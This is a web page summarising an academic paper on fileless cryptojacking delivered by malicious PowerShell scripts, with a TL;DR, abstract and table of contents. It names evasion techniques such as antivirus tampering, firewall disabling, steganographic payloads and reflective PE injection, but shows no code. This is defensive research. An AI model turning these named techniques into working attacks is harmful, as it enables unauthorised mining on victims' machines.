Logo
ScienceStack
Table of Contents
Fetching ...
Sign In

The Pulse of Fileless Cryptojacking Attacks: Malicious PowerShell Scripts

Said Varlioglu, Nelly Elsayed, Eva Ruhsar Varlioglu, Murat Ozer, Zag ElSayed

TL;DR

This paper investigates PowerShell-based fileless cryptojacking, focusing on RAM-resident coinminers that evade disk-based detection. It combines a descriptive analysis of malicious scripts with a new dataset of 200 PowerShell fileless cryptojacking samples, mapped to the MITRE ATT&CK framework to reveal tactic- and technique-level patterns. The study highlights how attackers leverage Log4Shell and other RCE vectors, living-off-the-land techniques, obfuscation, steganography, and C2 channels (including Pastebin) to deploy and persist mining operations. Key contributions include a structured MITRE ATT&CK analysis across Initial Access, Execution, Persistence, Defense Evasion, Credential Access, Discovery, Lateral Movement, and Command and Control, as well as a publicly available script corpus for future research and detection development. The findings underscore the practical impact of fileless cryptojacking and point to NLP-based approaches as a promising direction for improved detection and attribution.

Abstract

Fileless malware predominantly relies on PowerShell scripts, leveraging the native capabilities of Windows systems to execute stealthy attacks that leave no traces on the victim's system. The effectiveness of the fileless method lies in its ability to remain operational on victim endpoints through memory execution, even if the attacks are detected, and the original malicious scripts are removed. Threat actors have increasingly utilized this technique, particularly since 2017, to conduct cryptojacking attacks. With the emergence of new Remote Code Execution (RCE) vulnerabilities in ubiquitous libraries, widespread cryptocurrency mining attacks have become prevalent, often employing fileless techniques. This paper provides a comprehensive analysis of PowerShell scripts of fileless cryptojacking, dissecting the common malicious patterns based on the MITRE ATT&CK framework.

The Pulse of Fileless Cryptojacking Attacks: Malicious PowerShell Scripts

TL;DR

This paper investigates PowerShell-based fileless cryptojacking, focusing on RAM-resident coinminers that evade disk-based detection. It combines a descriptive analysis of malicious scripts with a new dataset of 200 PowerShell fileless cryptojacking samples, mapped to the MITRE ATT&CK framework to reveal tactic- and technique-level patterns. The study highlights how attackers leverage Log4Shell and other RCE vectors, living-off-the-land techniques, obfuscation, steganography, and C2 channels (including Pastebin) to deploy and persist mining operations. Key contributions include a structured MITRE ATT&CK analysis across Initial Access, Execution, Persistence, Defense Evasion, Credential Access, Discovery, Lateral Movement, and Command and Control, as well as a publicly available script corpus for future research and detection development. The findings underscore the practical impact of fileless cryptojacking and point to NLP-based approaches as a promising direction for improved detection and attribution.

Abstract

Fileless malware predominantly relies on PowerShell scripts, leveraging the native capabilities of Windows systems to execute stealthy attacks that leave no traces on the victim's system. The effectiveness of the fileless method lies in its ability to remain operational on victim endpoints through memory execution, even if the attacks are detected, and the original malicious scripts are removed. Threat actors have increasingly utilized this technique, particularly since 2017, to conduct cryptojacking attacks. With the emergence of new Remote Code Execution (RCE) vulnerabilities in ubiquitous libraries, widespread cryptocurrency mining attacks have become prevalent, often employing fileless techniques. This paper provides a comprehensive analysis of PowerShell scripts of fileless cryptojacking, dissecting the common malicious patterns based on the MITRE ATT&CK framework.
Paper Structure (23 sections, 1 figure, 1 table)

This paper contains 23 sections, 1 figure, 1 table.

Table of Contents

  1. Introduction
  2. PowerShell-based Fileless Malware
  3. PowerShell-based Fileless Cryptojacking Malware
  4. The Dataset
  5. Data Analysis with MITRE ATT&CK Framework
  6. TA0001 Initial Access
  7. TA0002 Execution
  8. TA0003 Persistence
  9. TA0005 Defense Evasion
  10. Manipulating Antivirus Products
  11. Uninstalling Antivirus Products
  12. Firewall Disabling
  13. Dynamic Delay and Content Fetching
  14. Steganographic Tactics & Disguising Malicious Payloads in JPG & PNG Files
  15. Reflective PE Injection
  16. ...and 8 more sections

Figures (1)

  • Figure 1: Sample image file for a fileless cryptojacking steganography KRISTAL_2020.